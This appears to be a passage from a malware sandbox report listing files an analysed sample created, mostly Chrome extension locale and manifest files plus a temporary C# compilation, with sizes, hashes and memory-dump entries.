C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\sk\messages.json

Filesize
947B

MD5
a46e08b45be0532e461e007e894b94f4

SHA1
387b703c55af0cf77874a1b340969ece79c2705e

SHA256
5e886e7b616fbff3671dab632d1b6d8dceeff9004218485f1b911dcd8c9694a3

SHA512
388992752bd1efaebbd420fd5a8f2c6c775f2be4c61d690b46a418c72abaffe44ff8a4c332b45a8b75a243ae8d61f3d6da6e55fa768d17d2635079b03442a55f

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\sl\messages.json

Filesize
855B

MD5
9cdfa5371f28427f129d200338c47494

SHA1
19653347e92967564bd8df14fde2eea2dc87bceb

SHA256
75d018cc8525605ddc591f6bfe5bdaa2efb164934e9d5438972651f8c818d581

SHA512
e6122fd5c8d387a999ef57c877bb70c896c1012b592333bcf2b93e44f7e8ba487f264e83cdefbbde972040cf6dc8f14a4a9e0e0bca85cf1f9eaa35b817dd2869

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\sr\messages.json

Filesize
2KB

MD5
c2026342237e7686b1932af5b54f8110

SHA1
5af235b29947c7f770070f0a693979d9191fadb5

SHA256
a3eb276fbd19dce2b00db6937578b214b9e33d67487659fe0bf21a86225ece73

SHA512
2ce6fffa4ea16aac65acc8b5c1c9952eae1ac8891589266735c3ef0a0d20e2fa76940e6401d86eef5c87a1d24c1cc9a1caaf1c66819c56505b0b2860bfe5acfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\sv\messages.json

Filesize
800B

MD5
f008f729147f028a91e700008130da52

SHA1
643fff3dc0694fd28749768314150b30572caa54

SHA256
5f4229d18e5606330146ee13bdf726e10c1e06cbb15368c47f1ae68abe9ce4ba

SHA512
f5890cc08a9a40366cfffbbdb9b14e8083897a2950deb4bb23566d641dd4b06ab02479a2b83bd5001c179abff889506a3292cd92e31a6b92cad917dff760ab27

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\sw\messages.json

Filesize
840B

MD5
84eb1d6e827e40c578469eaab778e368

SHA1
3f53de16ab05f7e03ae6c8605c2339043c1a385f

SHA256
2c6b42d122943dc0ca92a33074d1a607351d3bc7f9768e174617fa7011a3de9f

SHA512
7a7ce81fa8be309d347ae0975fd6fcd904bc1ee86342dc0e88e789e7cf5967edd0ddccb9ba156510e74b025a23d479b6058101ffbb648c5d30c311f5ba1dfc6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\ta\messages.json

Filesize
3KB

MD5
24626ad7b8058866033738380776f59b

SHA1
a6abd9ab8ba022ea6619252df8422bf5f73b6a24

SHA256
3fc7f56f6d6d514b32547509b39f6380fc786efbcca4b9859f204456ca2e7957

SHA512
4fa2f084175d71923ae3186c8195781e1946f6c19b1a4bf659d3ae2dc45f1ac2f84d794b4487ec5e030ea899ee1decf07b3cdd3eb0d3dda996c5ff8a272cf97a

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\te\messages.json

Filesize
3KB

MD5
50ab4deabad394d13c265b8b80d9f9c3

SHA1
ce9c786cc92359ca34483bd57ce121f699920ddb

SHA256
90868a8a4a4dbf48770c14a161faea406ef9a453b75f4cb7a53c1b4e96a88599

SHA512
3ba6498cde1fe4c8f012a75ee546e9793b812cb7306c927054427fc697cb729549196f8e45db1a7a7dd1e485e6a3d3950168e33b03b669f5d4676c372f519a6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\th\messages.json

Filesize
2KB

MD5
0875b0bad81161ccf2c16e13ee49af9d

SHA1
686663983a022689dedf5ba22c0f169e1a654e64

SHA256
d299aa0c4f29c5c8248a1c51afdb7439f4cf7bc28ee02408a598f8aad9f70810

SHA512
d569dfda9f0851fb0d5b2b8454704461e0185b573f3839416f3237f2d89c372e58fdce7d871f44f6f3777c7f4177009bb1fd3cdbe2f4f3d62015bd130851e8ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\tr\messages.json

Filesize
1KB

MD5
3104bcd0d4ad6b47fe36f36c1b5aa333

SHA1
36ec46c7230487c0d26e185aa82f340d8312a265

SHA256
ac2894cea6332450095a7f8fc9b97550da87e4b4b6e6fb95df1a1f49f25e0e35

SHA512
873a8e1ec1eb2b482794c51dbfdd5b96cb9e8e2b5a74db3c3b54ae78a396585faec402a054ff332551b5ebcfc4a57bfc5bd92d08f9f73acb433efe9a18d89cd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\uk\messages.json

Filesize
2KB

MD5
ae938164f7ac0e7c7f120742de2beb1e

SHA1
fc49041249eaef40632f27faa8561582d510d4e3

SHA256
08978a1425dec304483bbb7dd0e55a7d850c4561abd41bac1be5d93d70465174

SHA512
b3f252885f9d7e4d74a5880b5fa60447511d4e2dce64db8ede5bd1b144f0f09a3c784649c2e1623a034ddd50b6b7ff990a3a6fc58c3ae124646c31f35b0b20fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\ur\messages.json

Filesize
2KB

MD5
f6e8fca4fd1a7af320d4d30d6055fa6d

SHA1
1c4aae49c08a0e4ee3544063c10fe86e7fdab05e

SHA256
504549057a6a182a404c36112d2450864a6cb4574cd0e8f435ca556fac52ab0a

SHA512
241e8505658e09d5559ec3a91fc6d1a88ba61f1b714d3cfc0e498e13908ba45aed8b63b483ecc5008a5ab07b24e1d123192fbd90b4a2289d52ad7bef4a71c9e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\vi\messages.json

Filesize
1KB

MD5
1e54afbacca335be3a050920ddfbe863

SHA1
fabd5e9d6bda46c9708a0ee26302156ca413a1dc

SHA256
f1da95e1d58e933050cd8a4fea12f3d1b9a2759479ffdb74fdc1cfbf89568327

SHA512
dfe60c51c043da92dec81fedb250dc60bcd97daba831261de92cdee35c0760610c1d436d04d74b65ef0a22e8cdf5201e3dde176cd9b7d5ccf1cc1ff9c884870c

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\zh_CN\messages.json

Filesize
1KB

MD5
e910d3f03f0349f5c8a6a541107375d5

SHA1
2f3482194c98ecbd58a42bd29bb853267c49a39a

SHA256
3893c066a36fe95f06f3c49091a20290d4e071183755f40af05455660beda2dc

SHA512
387ca0727ad0869041296182f17555f55552245d38284a1d5d2652b72959cc94dd345f8a1d6d15f7f5477817df9afa045f2267269d0d66938c7d401b4ca2eb4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\_locales\zh_TW\messages.json

Filesize
1KB

MD5
b571e4cefd96a2651ffb6621c4d3d1b4

SHA1
9fce97192139d1ec0885fd62a059fa81e473f9c5

SHA256
16b8f7be42b982d5ad9f638e71da38d134394b9bab9255f73cf514abbfaaf146

SHA512
6a315031b7c3e7b2cdee7a835aaad7fceb07d2889e4401e3be6b3a8c6492a47a9a065aab85fe2a69a1eca6bfe4a733f8ccfe8c5ec2fef681aadb77c9f5e57eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5524_54359957\CRX_INSTALL\manifest.json

Filesize
2KB

MD5
1048f1f4d861f5c812e5bc268eb68a06

SHA1
4c9495a3202f63fd0878086f27310db6d3bf5be9

SHA256
8b3b5b96a5d6d7c613052b4a751c6632f5f91cb0a912c96e515978999b6f43f5

SHA512
158ca9fc4e59568c8d04b8f6ad16fd8216ee10d8869ce1e2dec844e52d3d3b19bd98433665fa003552e8896a2691531141ee11fef212d8d66283d7002ece8c76

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5840_631178496\CRX_INSTALL\_locales\en\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5840_631178496\CRX_INSTALL\_locales\en_US\messages.json

Filesize
1KB

MD5
64eaeb92cb15bf128429c2354ef22977

SHA1
45ec549acaa1fda7c664d3906835ced6295ee752

SHA256
4f70eca8e28541855a11ec7a4e6b3bc6dd16c672ff9b596ecfb7715bb3b5898c

SHA512
f63ee02159812146eee84c4eb2034edfc2858a287119cc34a8b38c309c1b98953e14ca1ca6304d6b32b715754b15ba1b3aa4b46976631b5944d50581b2f49def

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5840_631178496\CRX_INSTALL\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5840_631178496\CRX_INSTALL\manifest.json

Filesize
1KB

MD5
2a738ca67be8dd698c70974c9d4bb21b

SHA1
45a4086c876d276954ffce187af2ebe3dc667b5f

SHA256
b08d566a5705247ddc9abf5e970fc93034970b02cf4cb3d5ccc90e1a1f8c816e

SHA512
f72b9190f9f2b1acc52f7fbb920d48797a96e62dfc0659c418edbbc0299dccf1931f6c508b86c940b976016745b9877f88f2ee081d3e3d5dcdcc2cc7e7884492

Download Submit
C:\Users\Admin\Downloads\images.webp:Zone.Identifier

Filesize
231B

MD5
b84bc119d1ced17e676a6ffc94649eb7

SHA1
9d01bf854b31da847d3b376b8eef639ba099071b

SHA256
02d58f4eecfab715330b2ffe3b8c660761d34b9f87d2e30d6c6c4a511a84be46

SHA512
f3c0effb6c7c7b9e132c01190de5e70d8995abf55c9ba4fb9af8077e19958e7ca6db2a8db0c5db3ec2376f2990c5c6b1d32f97e8fbaa55da0bd404368a014bf6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2cjtusgn\2cjtusgn.0.cs

Filesize
393B

MD5
08efefe3875fcd7ffb420b8b8cd37cf3

SHA1
3897ca057a1e2e4e96edecb995bb9ed9612af1c5

SHA256
19244fe95a43eefd4dede9fb2d97ea0d19aaff35e116de3ea486b16730138c57

SHA512
6e6c4c7b751a54e0d816ca60fca1c7a56b7238ef34dc51ab094414fe5b7606edef414f437487610fe2bfda1cf971af7642c1b89c3edc09a0a0f73319e794ce56

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2cjtusgn\2cjtusgn.cmdline

Filesize
369B

MD5
03998c262f21738366fea0df6eb995f0

SHA1
3fa0efb46bbbe9936d17daa2b60c3967c1b0fb06

SHA256
5ebb597fc3ed067dda5c7515f95fb36e2575630d491fce0d7e58b225765ae624

SHA512
f7231ac6aa6ea21ce34e3ad77ca7eeabbea2ef70b7aaa9b24cc09f28531122ed3d36208c330dd2da49f3a14428fb9380747200c9fb4d80100c155bfdf7a46252

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2cjtusgn\CSC1FC98129927545CA943ACED7CAEBA2A2.TMP

Filesize
652B

MD5
178133898812b4e000e7ee1232a1d99b

SHA1
1ddf2fefc6a75d4b8919961f7c4bac57446529e1

SHA256
7989ce7986fd911ecc63b006e782f9a4ebaa45e16e297c599de6f4c856e00936

SHA512
647e1d67cdeb8dbbbd5a622d3d0fbc66ff007d33b5e24a0419287434bc3aa64f8597306235936dcc5642eb4d1f589b5581f9ea3907422c6122a8bc39e4bc736c

Download Submit
memory/2476-521-0x00000153035B0000-0x0000015303820000-memory.dmp

Filesize
2.4MB

Download
memory/2476-50-0x0000015301DA0000-0x0000015301DA1000-memory.dmp

Filesize
4KB

Download
memory/2476-46-0x00000153035B0000-0x0000015303820000-memory.dmp

Filesize
2.4MB

Download
memory/2476-517-0x0000015301DA0000-0x0000015301DA1000-memory.dmp

Filesize
4KB

Download
memory/2476-22-0x0000015301DA0000-0x0000015301DA1000-memory.dmp

Filesize
4KB

Download
memory/2476-30-0x0000015301DA0000-0x0000015301DA1000-memory.dmp

Filesize
4KB

Download
memory/2476-2-0x00000153035B0000-0x0000015303820000-memory.dmp

Filesize
2.4MB

Download
memory/2476-513-0x0000015301DA0000-0x0000015301DA1000-memory.dmp

Filesize
4KB

Download
memory/5008-31-0x000001F16F490000-0x000001F16F4B2000-memory.dmp

Filesize
136KB

Download
memory/5868-637-0x00000180FB6D0000-0x00000180FB6D8000-memory.dmp

Filesize
32KB

Download